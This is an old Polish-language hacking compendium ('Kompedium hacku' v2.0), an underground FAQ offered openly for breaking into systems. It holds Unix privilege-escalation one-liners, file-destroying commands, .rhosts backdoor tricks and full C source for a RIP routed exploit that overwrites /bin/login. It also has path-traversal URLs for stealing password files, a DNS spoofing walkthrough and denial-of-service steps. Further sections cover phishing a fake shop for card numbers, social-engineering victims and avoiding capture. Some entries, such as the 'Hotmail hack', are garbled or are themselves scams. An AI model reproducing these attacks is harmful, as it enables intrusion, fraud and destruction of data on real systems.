                                Kompedium hacku by Cyber
                                         v2.0
             ********************************************************************
             *Nieponosze zadnej odpowiedzialnosci za zawarte w tym faq materialy*
             ********************************************************************

HACK ZONE umiera !!!!!!!!!!!.Pomozcie najbardziej zasluzonemu polskiemu serwerowi hackerskiemu.www.hack.zone.to
NIECH ZYJE ANTI-SOCIAL MAGAZINE 

Hej jak wiecie nazywam sie Cyber.Niebede sie tu rozpisywal na swoj temat <patrz Cyber&Red Guy faq>.Zaczne
od tego ze niektore metody tu zawarte zostaly zaczerpniete z paru faq <wkoncu to ma byc kompedium>
Dlatego tez nie przypisuje ich sobie.Pewna czesc tego faqu zostala zapisana w postaci teoretycznej poniewaz
niechce aby po jego przeczytaniu jakas lama uwazala sie za hackera.

LEGENDA
+ uaktualnione

ZAWARTOSC
1.Bugi i Exploity (+)
2.Dziury 
3.DNS hacking
4.Czego mozna sie dowiedziec o serwerze 
5.Inne
6.Linki
7.Hack -przemyslenia
8.Hack Scena made in Pl
9.Co mysla o nas nasi zagraniczni koledzy (+)
10.JAK SIE NIE DAC ZLAPAC
11.Greetzy


1.Bugi

Chyba kazdy wie co to jest bug.Jesli nie to juz tlumacze.Jest to dziura w systemie,kodzie programu itd.
Jednym slowem jest to co tygrysy lubia najbardziej
Ostrzegam! Niektore z tych bugow sa dosyc stare wiec niekoniecznie beda dzialac
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
HACK HOTMAIL (zaczeprniete z usenetu) by Howard Barnes
1.Z jakiegokolwiek konta mailowego (tylko nie hotmailowego) wysylamy list pod adres sysad2@hotmail.com
sysad2@hotmail.com to adres bota (ciekawe czy jeszcze stoi,zawsze mozna poszukac nowego)
2.W temacie wpisujemy pwdgen=<"nazwa@hotmail.com"> gdzie nazwa to poprostu adres np zybszek@hotmail.com
3.W tresci wpisujemy nasz login i password oraz 4-digit autorization code <musimy miec konto na hotmailu>
np. 
E.g.
redbaron@hotmail.com
 microman
 PS127
<PS musi byc przed kodem ktory jest od 1-512>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Bugi IE 3.0 i 4.01
Czyli jak skasowac haselka do IE 3.0 i 4.01
regedit>hk_local_machine>Software>microsoft>windows>current version>policies>i kasujemy odpowiedni klucz
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=+++++++++++
BUGI W BSD
BSD <4.3
-Niegdys poleceniem ln mozna bylo czytac poczte userow <ostatnio trafilem na serwer na ktorym to nadal dzialalo>
-Moglismy zmieniac plik readonly
-<to juz chyba  niedzialab (90%) finger "string|/bin/rm -f /etc/passwd "
-ln -s target ~/.plan; 
-lpr file: rmfile;  ln -s /jakis/plik np./etc/passwd
-ln -s /jakis/suid/plik -i;-i  -dostajemy suid shell
-ftp -n;quote user ftp ;cd ~root -dostajemy uprawnienia roota <podobno to dziala>
-mailem dawalo sie walic dowolne polecenia <only 4.1>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
BUGI W SYSTEMIE SUNOS
-ln -s /jakis/suid/plik -i;-i
-symlink .plan do wybranego pliku
-window manager moze byc uzyty do przeczytania jakiegokolwiek pliku <w ciagu tego roku zadzialalo mi na jednym serwerze> 
-jesli rexd jest uruchomiony to kazdy moze dostac przywileje roota
-dzieki uucico mozeme zobaczyc ph num,login,password
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
UUCP
cat >x
myhostmyname
znak zatwierdzenia i D
uucp x ~uucp /.rhosts
rsh myhost -l uucp -i
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SYSTEM ???????????? <raczej na kazdym dzialao>
Wysylamy mailem taka linijke
~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh -dostaniemy roota
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SYSTEM V  
if (mnknod (dir,S_IFDIR | 0777)==0)
chown (dir,getuid(),getgid());
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SYSTEM ?????????? <raczej kazdy>
fd = create("/usr/preserve/Exaaa$PID,0600);
chown ("/usr/preserve/Exaaa$PID,real_uid;real_gid
lub fchown (fd.............. itd
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++                         
XWINDOW
Dostanie roota

$ rlogin target
$ xwd -root -dsiplay localhost:0.0>~/snarfed.xwd
$ exit
$ xwud -in ~/snarfed.xwd

niestety trzeba to zrobic z konta
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BSD 4.4 BASED ROUTED TRACE FILE EXPLOIT
Dziala przewaznie na 520 porcie

#define FILETOCREATE    "/bin/login"


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <linux/udp.h>
#include <netinet/protocols.h>
#include <netdb.h>
#include <protocols/routed.h>
#include <linux/route.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/*
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

/* Send faked UDP packet. */
int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long  int saddr, daddr;
char *data;
{  
  struct iphdr  ip;
  struct udphdr udp;
  static char packet[8192];

  /* Fill in IP header values. */
  ip.ihl      = 5;
  ip.version  = 4;
  ip.tos      = 0;
  ip.tot_len  = htons(28 + datalen);
  ip.id       = htons(31337 + (rand()%100));
  ip.frag_off = 0;
  ip.ttl      = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check    = 0;
  ip.saddr    = saddr;
  ip.daddr    = daddr;
  ip.check    = in_cksum((char *)&ip, sizeof(ip));

  /* Fill in UDP header values. Checksums are unnecassary. */
  udp.source = htons(sport);
  udp.dest   = htons(dport);
  udp.len    = htons(8 + datalen);
  udp.check  = (short) 0;

  /* Copy the headers into our character array. */
  memcpy(packet, (char *)&ip, sizeof(ip));
  memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
  memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

  return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0,
         (struct sockaddr *)sin, sizeof(struct sockaddr_in)));
}

/* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */
unsigned int lookup(host)
char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr(host);	/* Try if it's a "127.0.0.1" style string */
  if (addr == -1) 		/* If not, lookup the host */
  {
    he = gethostbyname(host);
    if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
      return 0;

    bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
  }
  return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s;
  struct rip rp;

  if(argc != 4)
    errs("\nSee http://www.rootshell.com/\n\nUsage: %s <source_router> <dest_addr> <command>\n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]);

  if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err("Unable to open raw socket.\n");

  if(!(saddr = lookup(argv[1])))
    err("Unable to lookup source address.\n");
  if(!(daddr = lookup(argv[2])))
    err("Unable to lookup destination address.\n");

  sin.sin_family     = AF_INET;
  sin.sin_addr.s_addr= daddr;
  sin.sin_port       = 520;

  /* Fill in RIP packet info */
  rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */
  rp.rip_vers = RIPVERSION; /* Must be version 1 */
  sprintf(rp.rip_tracefile, FILETOCREATE);

  if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1)
  {
    perror("sendpkt_udp");
    err("Error sending the UDP packet.\n");
  }
}


2.Dziury www i takie tam

Dziura nr.1
www.ofiara.com/cgi-bin/chkmsgs.cgi?n=100
                                     101 
                                     102 itd
Dziura nr.2 czyli mail
lamer@ofiara.com<etc/passwd (lub inny plik)

Dziura nr.3 znow przegladara
http://xxx.xxx.xxx/cgi-bin/php.cgi?/plik/do/przejrzenia

Dziura nr.4 i 5
http://www.ofiara.com/~root/etc/passwd
http://www.ofiara.com/~bin/etc/passwd

Dziura nr.6 
Czyli  wwwboard
http://adres/projects/archeo/wwwboard

Dziura nr.7-8
Czyli stary FrontPage
www.serwer.com/_vti_prt/service.pwd
www.serwer.com/~user/_vti_prt/service.pwd



3.DNS hacking <Umieszczone tu z powodu ze jest to zajebisty tekst o DNS hackingu
Jesli ktos niewie jak dziala DNS niech przeczyta w00w00 faq,mozna go sciagnac ze strony www.hackersclub.com>

DNS ID hack/spoof.Now it's time to clearly explain what DNS ID hacking/spoofing is.Like we explained before, the only way for the DNS to recognize the different questions/answers is the ID flag in the packet. Look at this example:  ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53  So you only have to spoof the ip of ns.heike.com and answer your false information before ns.heike.com does first!  ns.bibi.com <------- . . . . . . . . . . .  ns.heike.com                     |                    |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com   But in practice you have to guess the good ID. If you are on a LAN, you can sniff to get this ID and answer before the name server (it's easy on a
Local Network :)  If you want to do this remotely you don't have a lot a choices, but you do have 4 basic methods:  1.) Randomly test all the possible values of the ID flag. You must answer     before the NS (ns.heike.com in this example)! This method is obsolete     unless you want to know the ID or any other favorable condition to     its prediction.  >>> This method is not obsolete --- it's how real attacks work. It     takes less than a minute on a DS1 to exhaustively search all the     ID's, and if you flood (or crash) the authority servers for the     resource record you're trying to inject, you have all the time      in the world to do it. This is the problem that the current DNS     protocol can't fix.  2.) Send some DNS requests (200 or 300) in order to increase the chances     of falling on the good ID.  >>> This is analogous to using 200 or 300 responses (both consume ID      space), except that naieve DNS servers might not detect 300 queries,     even if they do detect 300 wrong answers.  3.) Flood the DNS in order to avoid its work. The name server will crash    and show the following error!      >> Oct 06 05:18:12 w00w00 named[1913]: db_free: DB_F_ACTIVE set - ABORT        at this time named is out of order :)  4.) Or you can use the vulnerability in BIND discovered by SNI (Secure     Networks, Inc.) with ID prediction (we will discuss this in a bit).  ##################### Windows ID Vulnerability ###########################I haven't tested this on WinNT, but Windows ID's are extremely easy to predict because it is '1' by  default, and '2' for the second question (if they are 2 questions at the same time).######################## BIND Vulnerability ##############################There is a vulnerability in BIND (discovered by SNI as stated earlier)  >>> we didn't discover this; it's old news. We released an advisory on >>> how much easier it is to exploit than the old papers let on. that we will be using. In fact, DNS IDs are easily predictable; you only have to sniff a DNS in order to do what you want. Let me explain...The DNS uses a random ID at the beginning but it only increases this ID for the next question.It's easy to exploit this vulnerability.Here is the way: 1. Be able to sniff easily the messages that comes to a random DNS (ex.   ns.dede.com for this sample). 2. You ask NS.victim.com to resolve <whatever>.dede.com, and NS.victim.com   will ask ns.dede.com to resolve <random>.dede.com  ns.victim.com ---> [?<random>.dede.com ID = 444] ---> ns.dede.com 3. Now we have the ID of the message from NS.victim.com, now you know what   ID area you'll have to use. (ID = 444 in this sample). 4. You then make your resolution request. ex. www.microsoft.com to   NS.victim.com   (you) ---> [?www.microsoft.com] ---> ns.victim.com     ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com     5. Flood the name server ns.victim.com with the ID (444) you already have and   then you increase this by one.   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com  ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com  ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com  ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com  ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com  ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com  Now you know that DNS IDs are predictable, and they only increase. You flood ns.victim.com with spoofed answers with the ID 444+ ;)  >>> That's not true on OpenBSD (random scoreboarded IDs).   [Note: WSDspoofID does this]  There is another way to exploit this vulnerability without a root on any NS.The mechanism is very simple. Here is the explanation:  We send to ns.victim.com a resolution request for *.provnet.fr  (you) ----------[?(random).provnet.fr] -------> ns.victim.com  Then, ns.victim.com asks ns1.provnet.fr to resolve <random>.provnet.fr.There is nothing new here, but this is where the interesting part begins here.  At this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr IP) with IDSs from 100 to 110:  (spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com  (spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com  (spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com  (spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com ...After that, we ask ns.victim.com if <random>.provnet.fr has an IP address.If ns.victim.com give us an IP address for <random>.provnet.fr then we have found the correct! Otherwise, we have to repeat this attack until we find the ID. It's a bit long but it's effective. [Note: This is how WSD-IDpred works]  ########################################################################## Here you will find 5 programs ;WSDkillDNS   - very simple DNS spoofer ;WSDsniffID   - sniff a LAN and reply false DNS answers before the NS;WSDspoofID   - a DNS ID spoofer (you'll need to be root on a NS);WSD-IDpred   - a DNS ID predictor (no need to be root on a NS);WSD-baddns   - a very simple denial of service attack to disable DNS  Note: You can find source and binaries of these programs at ftp.w00w00.org/pub/DNS. You need to install libpcap on your machine before any compilation of the w00w00 ID programs.  - w00w00 Security Development (WSD)  See http://www.w00w00.org and ftp://ftp.w00w00.org/pub  Thanks to: pirus, Heike, and all of w00w00 Security Development (WSD), and Asriel.

4.WYWIAD
Zacznijmy od tego ze powinnienes pojsc na strone danego serwera.Spisz dane admina,userow i najwazniejszych rzeczy przedstawionych na stronie
Sprawdz czy swiadcza jakiegos rodzaju uslugi internetowe
Zobacz jakie pliki sa dostepne przez ftp (obejrzyj je)
Zorientuj sie jakiego rodzaju oprogramowania uzywaja,na czym maja postawiony serwer i poszukaj roznych bugow i taki tam podbonych zwiazanych z tym stuffem

echo adres.ofiara.com.pl lp] > ~/.rhosts -dane o serwerze 
moze tez sprawdzic jaki secure http jest na hoscie:
poprzez wejscie na port 80 hosta <jak cos napiszemy i nacisniemy enter po pewnym czasie rozlaczy nas jednoczesnie pokazujac wersje scure http
lub tak
http://www.secure -serwer.com:80/ secure-http/1.1      
1.1 znaczy wersje secure http

5.Inne

a) Atak metoda rozsynchronizowania
Otoz najczesciej aby rozsynchronizowac serwer wystarczy zapchac go duza iloscia pustych danych.A co to
sa puste dane??.Otoz sa to dane ktore zmieniaja numer potwierdzenia TCP.Jedank aby rozsynchornizowac
serwer musimy wyslac puste dane zarowno do wybranego przez nas aktywnego  usera jak i serwera.Wtedy
tez czekamy az serwer wysle do nas pakiet zsynchronizowanego polaczenia.A nastepnie <user jest odrzucany
podszywamy sie pod usera

b)To ma troche malo wspolnego z hackiem no ale coz...
-telnetujemy sie na port 53 serwera
-wpisujemy tam jakies bazgroly
-naciskamy enter i zamykamy sesje
 (serwer teraz nie przyjmuje zadnych danych)
-piszemy ping -sv -i 127.0.0.1 224.0.0.1
-system sie reebotuje
-Odpalamy program qmail
-i serwer jest czysty

www.student.tdp.uu.se/~t95hhu/programs/qmail

c)Podszywanie sie pod www
Pewnie myslicie na czym to polega??? Juz tlumacze.Zalozmy ze nasza strona to www.cybguy.com.
Na przyklad adres www.dupa.com bedzie mial link w postaci www.cybguy.com/www.dupa.com.Zalozmy
ze jakis koles bedzie chcial pojsc przez link na strone www.dupa.com przez co wladuje sie na
www.cybguy.com niewiedzac o tym <odpowiednio preparujemy strone>.I zalozmy ze taki lamer bedzie
chcial cos zamowic <podszyjemy sie pod sklep>.Wysle do nas swoje dane i numer karty.A My co robim????
To juz chyba kazdy wie <niezapomnijcie o potwierdzeniu zakupu>

d)Cookie <ciekawostka>
Jezeli np.w nazwie domeny dopiszemy trzy kropki to na serwerze zostanie utworzony plik cookie
np. www.dupa.com... Ba ten plik cookie moze byc odebrany przez kazdego a do tego mozna utworzyc plik zwracany do domeny
Pomyslcie co mozna przez to osiagnac

e)Czy to dziala
Niegdys w zamierzchlych czasach dzialalo cos takiego,ze duza liczba prosb o haslo mogla spowodowac wpuszczenie do systemu

f) Zaczerpniete z jakiegos faq <przepraszam ale niepamietam jego autora,mam nadzieje ze sie nie wkurzy za opisanie go w kompedium)
Telnetujemy sie na port 79
$telnet goracy.host.com.pl 79
trying...
escape character is '

Teraz piszemy jakies imie.Wskocza nam dane wszystkich userow o tym imieniu czyli np.nr tel.
No i teraz telefonujemy do takiego bubka i social enigering
 
g)Ciekawostki

-Zdarza sie ze w niektorych banerach <stau4> jest haslo usera(wystarczy poszukac -wziasc wlasciwosci na banerze i szukac)

h).rhosts

Jak wiadomo jesli dopiszeme do czyjegos pliku .rhosts to spowodujemy ze kazdy system bedzie
zaufany dla jego konta.Jednym ze sposobow przemycenia powyzszej linijki dodajac ja do jakiegos
popularnego skryptu IRC </exec echo ++> $home /.rhosts>.Oczywiscie jesli user jest lamerem powiedziec
mu ze ma cos zle ustawionego na irc i zeby to wpisal.Gdy tylko to zrobi to my na naszym koncie piszemy
rlogin <serwer ofiary> -l <usrename> np rlogin lamerzy.com.pl -l lamer

i)Micro$oft Outlook 95
W outlooku pana Billa Dupka znajduje sie dosyc fajna dziura <a moze raczej logi?>.Otoz w katalogu  c:/program files/internet mail and news/default user/mail/ znajduja
sie pliki z zawartoscia naszej wyslanej,odebranej,napisanej poczty <jest doslownie wszystko>.Pomyslcie jak to mozna wykorzystac,chodzby prze social enigering na irc <zepsol mi sie outlook czy mozesz wyslac mi te pliki?????>
<podwarunkiem ze jest nam czyjas poczta po cos potrzebna>

j)Bug w ksiegach gosci 				(sufur+lamentes)
Bug w ksiegach gosci (np. w ksiegach oferowanych przez serwer ib.torun.pl) polega na tym, ze wpis mozna zastapic kodem HTML.
Dla tych, ktorzy nie znaja HTML'a moge dodac, ze aby zwiekszyc czcionke, ktora ma byc dokonany wpis, nalezy napisac:
<H1>Teskst zwiekszony</H1>

Mozna tez zmieniac kolor:
<H1><FONT COLOR=RED>Tekst zwiekszony, czerwony</FONT></H1>

Jezeli chcesz wiedziec wiecej o HTML, polecam strone z kursem tego jezyka:
	http://www.pckurier.pl/html 

W ten sposob mozna dokonac naprawde "pamietnego" wpisu.


6. Linki <nie wszystkie linki sa aktualne>

http://www.cyberarmy.com                      (YEA!!!!!)
http://www.hackers.com
http://www.hacker.org
http://www.rootshell.com                      (POLECAM!!!)
http://wwww.hack.pl
http://www.friko5.onet.pl/lu/pherakpl         (POLECAM!!!)
http://www.free.com.pl/ground/polski/index
http://www.underground.com.pl                 (POLECAM!!!)
http://www.nmrc.org/
http://www.tipjar.com/generic.html) 
http://www.hackersclub.com/km/                (POLECAM!!!)
http://www.hackersclub.com/lou
http://www.l0pht.com                          (POLECAM!!!)
http://www.silitoad.org
http://www.ilf.net/rebnet/LRhp.html
http://www.geocities.com/CapeCanaveral/3498/security.htm
http://www.2600.com/
http://www.fc.net/phrack.html
http://www.underground-online.com/
http://www.hackers.com/hacker101
http://www.asmodeus.com/
http://www.geek-girl.com/bugtraq/
ftp://FTP.GreatCircle.COM, 
http://www.cert.org
http://www.elitehackers.org/
http://astalavista.box.sk 
http://www.dhp.com/~fyodor 
http://www.hacked.net/
http://rainbow.mimuw.edu.pl/SO/Linux/index.html 
http://www.ict.pwr.wroc.pl/listserv/security/
http://www.phrack.com                          (POLECAM!!!)
ftp://ftp.ishiboo.com/phrack
http://www.infonexus.com/~daemon9/Projects
ftp://azrael.phrack.com/pub/phrack
http://voltronik.tarman.net/cracker.html
http://www.nmrc.org/compute/intrude.html
http://www.leviathan.org/phrack.html
http://www.sevenlocks.com/
http://www.nmrc.org/ 
http://www.alw.nih.gov/Security/prog-full.html
http://www.cs.uit.no/~runeb
http://www.fc.net/phrack     
http://dhea.natureplus.com
http://www.scramblingnews.com
http://www.hackerscatalog.com
http://ireland.iol.ie/~kooltek/welcome.html
http://www.pixi.com/~reader1.
http://www.w00w00.org and ftp://ftp.w00w00.org/pub

2600.com (2600 Magazine) <wole ftp od http>
aeneas.mit.edu (Kerberos) 
alex.sp.cs.cmu.edu (Misc) 
asylum.sf.ca.us (CyberWarriors of Xanadu) 
athena-dist.mit.edu (Athena Project) 
atlantis.utmb.edu (Anti-virus) 
bellcore.com (Bellcore) 
cert.org (CERT) 
ciac.llnl.gov (CIAC) 
clark.net (H/P) 
cnit.nsk.su (Security) 
coast.cs.purdue.edu (Security/COAST) 
coombs.anu.edu.au (Security) 
csrc.ncsl.nist.gov (NIST Security) 
dartmouth.edu (Security) 
ds.internic.net (Internet documents) 
etext.archive.umich.edu (PrivateLine) 
ftp.3com.com (Orange Book) 
ftp.acns.nwu.edu (Mac Anti-virus) 
ftp.acsu.buffalo.edu (Security) 
ftp.alantec.com (Tcpr)  
ftp.armory.com 
ftp.auscert.org.au (Australian CERT) 
ftp.cerf.net (CERFnet) 
ftp.cert.dfn.de (FIRST) 
ftp.cisco.com (Cisco) 
ftp.commerce.net (Secure HyperText) 
ftp.cs.colorado.edu 
ftp.cs.ruu.nl (Security & PGP) 
ftp.cs.uwm.edu (Privacy Digest) 
ftp.cs.vu.nl 
ftp.cs.yale.edu 
ftp.csi.forth.gr 
ftp.csl.sri.com (SRI) 
ftp.csn.org (Cryptology) 
ftp.csua.berkeley.edu (Crypto) 
ftp.delmarva.com 
ftp.denet.dk 
ftp.digex.net 
ftp.dsi.unimi.it 
ftp.dstc.edu.au 
ftp.ee.lbl.gov 
ftp.eff.org (EFF) 
ftp.elelab.nsc.co.jp (Security) 
ftp.etext.org (Etext) 
ftp.fc.net (phrack) 
ftp.foobar.com 
ftp.funet.fi 
ftp.gate.net 
ftp.giga.or.at (H/P) 
ftp.greatcircle.com (Firewalls) 
ftp.ieunet.ie (Security) 
ftp.ifi.uio.no 
ftp.indirect.com 
ftp.info.fundp.ac.be 
ftp.informatik.uni-hamburg.de 
ftp.informatik.uni-kiel.de 
ftp.inoc.dl.nec.com (Security) 
ftp.isi.edu 
ftp.lava.net (H/P) 
ftp.lerc.nasa.gov 
ftp.llnl.gov (CIAC) 
ftp.lod.com Lod com 
ftp.luth.se 
ftp.lysator.liu.se 
ftp.mcs.anl.gov 
ftp.microserve.net (Mac) 
ftp.near.net (Zines) 
ftp.nec.com 
ftp.net.ohio-state.edu  
ftp.netcom.com (H/P)  
ftp.netsys.com 
ftp.ocs.mq.edu.au (Cryptology) 
ftp.ox.ac.uK 
ftp.paranoia.com (ToneLoc) 
ftp.pop.psu.edu 
ftp.primenet.com (H/P)  
ftp.primus.com (Security) 
ftp.psy.uq.oz.au  
ftp.rahul.net  
ftp.sert.edu.au 
ftp.sgi.com  
ftp.std.com (Zines)  
ftp.sunet.se (Ethernet sniffers) 
ftp.sura.net (SURAnet) 
ftp.technet.sg 
ftp.tis.com (TIS) 
ftp.tisl.ukans.edu 
ftp.uni-koeln.de (Wordlists) 
ftp.uspto.gov 
ftp.uu.net (Zines) 
ftp.uwp.edu (Copy Protection) 
ftp.vis.colostate.edu 
ftp.vix.com 
ftp.vortex.com 
ftp.warwick.ac.uk (Zines) 
ftp.wi.leidenuniv.nl 
ftp.win.tue.nl (Security) 
ftp.winternet.com (H/P) 
ftp.wustl.edu (EFF) 
ftp.zoom.com 
ftp.zrz.tu-berlin.de (Cryptology) 
garbo.uwasa.fi (Cryptology) 
gti.net 
gumby.dsd.trw.com 
hack-this.pc.cc.cmu.edu (Down for Summer) 
heffer.lab.csuchico.edu (Third Stone From The Sun) 
hplyot.obspm.fr 
info.mcs.anl.gov 
jerico.usc.edu 
invircible.com (Virii) 
l0pht.com (The L0pht) 
lcs.mit.edu (Telecom archives) 
mac.archive.umich.edu 
mary.iia.org (Misc) 
monet.ccs.itd.umich.edu 
net.tamu.edu (Security) 
net23.com (Max Headroom) 
nic.ddn.mil (DDN Security) 
nic.sura.net 
oak.oakland.edu (Ham Radio)  
parcftp.xerox.com 
prism.nmt.edu (Terrorist Handbook) 
pyrite.rutgers.edu (Security) 
relay.cs.toronto.edu (Telecom) 
rena.dit.co.jp (Security) 
research.att.com (AT&T) 
ripem.msu.edu (Ripem) 
rtfm.mit.edu (Usenet FAQ's) 
scss3.cl.msu.edu (Crypto) 
sierra.stanford.edu 
sunsolve1.sun.com 
ftp.technion.ac.il 
theta.iis.u-tokyo.ac.jp (Security) 
titania.mathematik.uni-ulm.de (Security) 
toxicwaste.mit.edu (Breaking RSA) 
ugle.unit.no 
vic.cc.purdue.edu 
vixen.cso.uiuc.edu 
wimsey.bc.ca (Crypto) 


7.Hack -przemyslenia
Hack co to wogole jest????????? TO pytanie zadaje sobie niemal codziennie.Niektorzy twierdza
ze jest to wlamywanie sie do systemow,robienie admina w konia,zmienianie strony www i takie tam
Ale dla mnie jest to styl zycia,zyje w sieci.To ONA jest dla mnie prawdziwym domem - tu mieszkam
tu ucze sie,tu sie bawie,tu mam przyjaciol.A hack jest jej najczystsza esencja.To nie ja zajmuje
sie hackiem ale to On mna.On mnie uczy,bawi i jest moim przyjacielem.Gdyby nie hack dawno bym juz
przestal istniec.Hack to nie wlamywanie sie do systemow,nie.To styl zycia i sposob myslenia.Jesli
sie tego nauczysz bedziesz hackerem.

8.Hack scena made in pl
Polska hack scena........ hmm no coz.Trudno duzo tu o niej powiedziec.Czemu??? Bo ci co cos umieja
zamiast pomagac poczatkujacym zadzieraja nosy i nic nie mowia,albo sie wogole nie pokazuja.No ale z kolei niedziwie 
sie im.Jak sie patrzy na takiego lamera co na irc wysyla pytanie o takiej tresci <naucz mnie wlamywac sie>
to az plakac sie chce.Teraz dam taka mala porade dla poczatkujacych <kupcie ksiazki o unixach itp.,czytajcie
obcojezyczne faq,jesli macie o cos pytac to niech to bedzie sensowna rzecz>.Ale ogolnie polska hack scena w porownaniu
do tej sprzed paru lat ma sie lepiej <wlamy do NASKu,Canal+ itd>.Szkoda tylko ze tak na #hackingpl pusto :((((((((

10.Co mysla o nas nasi zagraniczni koledzy
Ostatnio na ircu <jako Xyber> rozmawialem z pewnym administratorem francuskiej firmy zajmujacej sie bezpieczenstwem sieciowym
Spytalem sie go co mysli o Polskich hackerach??????? Stwierdzil ze Polski hack stoi na wysoki poziomie <nie liczac lamerow ktorych
wszedzie pelno>Zdziwil mnie strasznie poniewaz niespodziewalem sie takiej oceny.Myslalem ze powie cos takiego: "Polscy hackerzy a 
oni wogole istnieja".Jak sie okazuje z polskim hackiem nie jest tak zle :)


10.JAK NIEDAC SIE ZLAPAC.
Dobra nie bede tu pisal ze masz wymagac logi tu i tu <znajdziesz to w innych faqach>.Ale zacznijmy od tego ze musisz uwazac
laczac sie przez TPSA <huje monitoruja> wiec lepiej juz wlamuj sie przez serwery proxy
Nie uzywaj zadnych skanerow phf i php <-- to gowno zostawia logi i jesli nawet znajdziesz hasla ale wmiare szybko nie wejdziesz
na serwer to admin bedzie mogl zlozyc na ciebie skarge jako ze naruszyles bezpieczenstwo jego serwera
W ostatecznosci korzystaj z Social Enigeringu i koni trojanskich <-- admin zawsze bedzie mial punkt zahaczenia jakby cie szukal.
I CHYBA NAJWAZNIEJSZE <--Jesli nie jestes pewien swoich umiejetnosci to lepiej przeloz to na inny dzien (albo popros aby ktos sie wlamal z toba)>

11. Greetzy

Aphazelowi -za wszystko
Lcamtuf&P0WER -nieznam was ale sie na waszej lekturze wychowalem
Ekipie H@ckpl -za udostepniona wiedze
Red Guyowi -za podrzymanie na duchu
Bartowi -za umieszczenie na swojej stronie mojego faqu
i wszystkim innym o ktorych zapomnialem <bez urazy>  

kontakt: puzonek@free.com.pl 
         xyber@kki.net.pl  